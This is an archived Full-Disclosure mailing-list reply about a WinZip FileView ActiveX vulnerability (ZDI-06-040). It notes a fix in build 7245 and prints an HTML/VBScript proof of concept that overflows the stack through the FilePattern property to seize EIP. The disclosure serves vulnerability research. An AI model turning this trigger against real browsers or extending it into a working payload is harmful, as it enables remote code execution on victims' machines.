[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <20061114223408.82134.qmail@web23304.mail.ird.yahoo.com>
Date: Tue, 14 Nov 2006 22:34:08 +0000 (GMT)
From: Micheal Turner <wh1t3h4t3@...oo.co.uk>
To: zdi-disclosures@...m.com, full-disclosure@...ts.grok.org.uk,
bugtraq@...urityfocus.com
Subject: Re: ZDI-06-040: WinZip FileView ActiveX Control
Unsafe Method Exposure Vulnerability
7245 correctly resolves this issue; standard stack
overflow in WZFILEVIEW.FilePattern snatching EIP; PoC
below;
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<SCRIPT LANGUAGE="VBScript">
<!--
Sub WZFILEVIEW_OnAfterItemAdd(Item)
WZFILEVIEW.FilePattern = "SMASHTHESTACKHERE"
end sub
-->
</SCRIPT>
<OBJECT ID="WZFILEVIEW" WIDTH=200 HEIGHT=200
CLASSID="CLSID:A09AE68F-B14D-43ED-B713-BA413F034904">
</OBJECT>
</BODY>
</HTML>
-- prdelka
___________________________________________________________
All new Yahoo! Mail "The new Interface is stunning in its simplicity and ease of use." - PC Magazine
http://uk.docs.yahoo.com/nowyoucan.html
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists